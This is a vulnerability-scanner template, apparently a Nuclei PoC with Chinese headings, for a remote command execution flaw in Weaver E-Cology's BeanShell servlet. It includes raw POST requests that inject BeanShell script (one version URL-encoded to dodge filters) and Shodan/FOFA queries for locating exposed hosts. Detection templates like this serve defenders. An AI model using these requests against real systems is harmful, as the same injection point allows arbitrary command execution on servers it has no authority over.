漏洞描述
Weaver BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program.
weaver-ecology-bshservlet-rce: Weaver E-Cology BeanShell - Remote Command Execution
PoC代码[已公开]
id: weaver-ecology-bshservlet-rce
info:
name: Weaver E-Cology BeanShell - Remote Command Execution
author: SleepingBag945
severity: critical
description: |
Weaver BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program.
classification:
cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: weaver
product: e-cology
shodan-query: ecology_JSessionid
fofa-query: app="泛微-协同办公OA"
tags: beanshell,rce,weaver,vuln
http:
- raw:
- |
POST /weaver/bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
bsh.script=print%28%22{{randstr}}%22%29%3B
- |
POST /weaver/bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
%62%73%68%2e%73%63%72%69%70%74=%70%72%69%6e%74%28%22{{randstr}}%22%29%3b
matchers-condition: and
matchers:
- type: regex
regex:
- "BeanShell Test Servlet"
- "(?i)<pre>(\n.*){{randstr}}"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022019fc75289e05fcb5dc857865735888c8e5c891b4570384269ec7df757d8bd124022100c9b0f023bc409b3f3a3b02865b9338fb463e5193c841cc4ef4808053f848d07e:922c64590222798bb761d5b6d8e72950